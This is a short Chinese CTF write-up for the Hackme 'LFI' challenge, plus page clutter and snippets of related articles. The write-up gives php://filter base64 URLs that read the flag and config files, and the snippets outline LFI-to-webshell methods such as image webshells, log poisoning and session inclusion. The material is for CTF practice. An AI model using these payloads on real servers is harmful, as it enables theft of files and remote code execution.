LFI例子

最新推荐文章于 2024-06-06 17:36:49 发布

SYQ608

最新推荐文章于 2024-06-06 17:36:49 发布

阅读量270

点赞数

分类专栏： Web

原文链接：https://blog.csdn.net/qq_34072526/article/details/89431431

版权

Web 专栏收录该内容

2 篇文章 0 订阅

订阅专栏

以【Hackme CTF】Web–LFI中的LFI为例

见到LFI已经可以本能地知道这是考察本地包含了，查看源代码发现参数是page要读取pages/啥啥，直接用php://filter绕过读取本地文件

https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag

发现网页出现一行base64
Q2FuIHlvdSByZWFkIHRoZSBmbGFnPD9waHAgcmVxdWlyZSgnY29uZmlnLnBocCcpOyA/Pj8K
base64解码得
Can you read the flag<?php require('config.php'); ?>?
所以写网址为

https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/config

得到base64
PD9waHAKCiRmbGFnID0gIkZMQUd7WW9vb29vb19MRklfZzAwZF8yY1h4c1hTWVA5RVZMcklvfSI7Cg==
解码得到flag

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。
本文链接：https://blog.csdn.net/qq_34072526/article/details/89431431

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

SYQ608

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

LFI本地包含的简单利用原理实现

sx234com的博客

04-09

553

一、基本思路： 1、图片插入一句话木马。利用上传功能上传此图片。 2、利用文件包含漏洞，读取此含有一句话木马的图片，生成真正shell文件，然后拿下shell。靶机使用dvwa 二、具体步骤： 1、制作一句话图片木马使用edjpgcom进行制作。如图将目标图片拖入文件夹中的自动打开了软件，输入一句话木马 <?PHP fputs(fopen('shell.php','w')...

LFI漏洞利用总结(文件包含)

qq_60115503的博客

04-19

6240

原因 LFI产生的原因是由于程序员未对用户可控变量进行输入检查,此漏洞的影响可能导致泄露服务器上的敏感文件,如若攻击者能够通过其他方式在Web服务器上放置代码,那么他们便可以执行任意命令涉及到的函数主要涉及到的函数 include() require() include_once() require_once() magic_quotes_gpc() allow_url_fopen() allow_url_include() move_uploaded_file()

参与评论您还未登录，请先登录后发表或查看评论

ctf中php常见的考点

热门推荐

一个安全研究员

11-06

1万+

本博文转自：大佬博客（侵权删）总结的很详细，忍不住转载系统变量 123456 $_POST // 获取 post 数据，是一个字典$_GET // 获取 get 数据，是一个字典$_COOKIE // 获取 cookie$_SESSION // 获取 session$_FILE // 获取上传的文件$_REQUEST // 获取 $_GET，$_POST，$_C

LFI2Shell

weixin_30500663的博客

12-01

111

Diffrent Way to Expl0it LFI! 1.如果允许上传，且可以得到路径，那么直接传shell，再LFI即可 2.不允许上传的情况下 (1)包含access.log 通过在user-agent里写入shell，然后再LFI access.log即可原理:access.log 是访问日志文件，你的访问里如果有php代码也会记录到里面，但是有个缺点，如果这个文件大...

php LFI漏洞的一些收集

u011500307的专栏

06-08

3274

1. LFI全称是local file include,先举个最简单的例子来说明下：

BugKu CTF（Web）：sqli-0x1 & baby lfi & baby lfi 2

Flag少侠的博客

05-10

1729

BugKu是一个由乌云知识库（wooyun.org）推出的在线漏洞靶场。乌云知识库是一个致力于收集、整理和分享互联网安全漏洞信息的社区平台。BugKu旨在提供一个实践和学习网络安全的平台，供安全爱好者和渗透测试人员进行挑战和练习。它包含了各种不同类型的漏洞场景，如Web漏洞、系统漏洞、密码学等，参与者需要通过解决这些漏洞来获取Flag。

LFI获取WENSHELL

代码析构师的专栏

02-10

757

关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的…不过大家都懒得测试,我就来整理下. 1.普通本地包含; 1 ?php $query=$_GET['p']; include($query); ?--> poc:http://127.0.

利用pearcmd.php本地文件包含（LFI）

Mrs_H的博客

01-08

6013

利用pearcmd.php本地文件包含（LFI）一.前言 pearcmd这个东西很久以前就已经复现过了，但是当时没有记录下来。这些天在整理之前比赛的wp的时候突然看见了pear的LFI到getshell，就突然想起来自己应该是利用过了的。但是怎么找也找不到之前的笔记，于是就有了再复现一遍的想法。二.正文 1.环境的准备这里的话我使用的是docker来搭建的一个lamp，然后在这个lamp上面进行后续的漏洞复现。至于为什么这么做呢？照P神的话来说就是因为在Docker任意版本的镜像中pear都会被默认安

LFI 绕过 Session 包含限制 Getshell

qq_45521281的博客

06-10

1437

文章目录前言用户会话会话存储会话处理LFI SessionSession Base64EncodeBypass serialize_handler=phpBypass serialize_handler=php_serializeNo session_start()表单利用攻击Conclusion session文件包含漏洞就是在用户可以控制session文件中的一部分信息，然后将这部分信息变成我们的精心构造的恶意代码，之后去包含含有我们传入恶意代码的这个session文件就可以达到攻击效果。前言之

LFI-CAM：学习特征重要性以获得更好的视觉解释

1355LFI-CAM：学习特征重要性以获得更好的视觉解释Kwang Hee Lee1，*，**，Chaewon Park1，*，Junghyun Oh1，2，* and NojunKwak21波音韩国工程技术中心（BKETC）2首尔国立大学摘要类激活映射（CAM）是一种用于理解...

ctf本地包括_新手入门之本地文件包含(附靶机文件)

weixin_39769984的博客

12-29

739

概述通过加强对本地文件包含(LFI)渗透测试技术的研究，可以帮助渗透测试人员和学生在未来的渗透测试过程中，识别和测试LFI漏洞。在Web程序渗透测试中，利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外，在本文中提到有一些技术，在CTF大赛中也经常被利用。什么是本地文件包含(LFI)漏洞?LFI允许攻击者通过浏览器包含一个服务器上的文件。当一个WEB应用程序在没有正确过滤输入数据的情况下...

【漏洞挖掘】——36、SVG SSRF Cheatsheet

Fly_鹏程万里

06-06

由于SVG丰富的特性集导致处理SVG的主机可能容易受到SSRF、LFI、XSS和RCE的攻击，下面所有的这些方法都指定了一个URI，它可以是绝对路径，也可以是相对路径，FILE协议和HTTP协议对于测试很重要，但是它也可以支持其他协议，这取决于实现(例如:PHP流方案)，包括javascript:和data:CSS Stylesheet SVG可以通过标记包含外部样式表，就像html一样 CSS stylesheet via @import CSS Stylesheet vi

Apache HTTP 过滤器filter、开源WAF（ModSecurity）、Apache 模块开发

西京刀客

03-08

2495

在编写Apache模块时，需要具备C或C++编程经验和对Apache Web服务器的基本了解。另外，需要参考Apache的文档和API参考手册来编写代码和构建模块。

【第20篇】像人类一样阅读：自主、双向和迭代语言场景文本识别建模

AI浩

11-14

1849

像人类一样阅读：自主、双向和迭代语言场景文本识别建模摘要语言知识对场景文本识别大有裨益。然而，如何在端到端深度网络中有效地建模语言规则仍然是一个研究挑战。在本文中，我们认为语言模型的有限能力来自：1）隐式语言建模； 2) 单向特征表示；和 3) 带有噪声输入的语言模型。相应地，我们提出了一种用于场景文本识别的自主、双向和迭代的 ABINet。首先，自治建议阻止视觉和语言模型之间的梯度流，以明确执行语言建模。其次，提出了一种基于双向特征表示的新型双向完形填空网络（BCN）作为语言模型。第三，我们提出了一

基于java网上球鞋竞拍系统设计与实现.docx

09-19

基于java网上球鞋竞拍系统设计与实现.docx

基于bert实现关系三元组抽取python源码+数据集+项目说明.zip

最新发布

09-19

基于bert实现关系三元组抽取python源码+数据集+项目说明.zip基于bert实现关系三元组抽取python源码+数据集+项目说明.zip基于bert实现关系三元组抽取python源码+数据集+项目说明.zip基于bert实现关系三元组抽取python源码+数据集+项目说明.zip基于bert实现关系三元组抽取python源码+数据集+项目说明.zip 个人大四的毕业设计、课程设计、作业、经导师指导并认可通过的高分设计项目，评审平均分达96.5分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者，也可作为课程设计、期末大作业。 [资源说明] 不懂运行，下载完可以私聊问，可远程教学该资源内项目源码是个人的毕设或者课设、作业，代码都测试ok，都是运行成功后才上传资源，答辩评审平均分达到96.5分，放心下载使用！ 1、该资源内项目代码都经过测试运行成功，功能ok的情况下才上传的，请放心下载使用！ 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习，也适合小白学习进阶，当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行，也可在此代码基础上进行修改，以实现其他功能，也可用于毕设、课设、作业等。下载后请首先打开README.md文件（如有），供学习参考。

基于java的足球赛会管理系统设计与实现.docx

09-19

基于java的足球赛会管理系统设计与实现.docx

基于java的婚纱摄影网的设计与实现.docx

09-19

基于java的婚纱摄影网的设计与实现.docx

LFI to RCE

10-19

LFI to RCE是指通过本来只能访问服务器上的文件的漏洞（LFI），进一步利用该漏洞实现远程代码执行（RCE）。一般情况下，LFI漏洞只能让攻击者读取服务器上的文件，但是如果攻击者能够找到一个包含可执行代码的文件，就可以通过LFI漏洞执行该代码，从而实现RCE攻击。攻击者可以通过访问服务器上的日志文件等方式获取到包含可执行代码的文件的路径，然后利用LFI漏洞执行该文件中的代码，从而实现RCE攻击。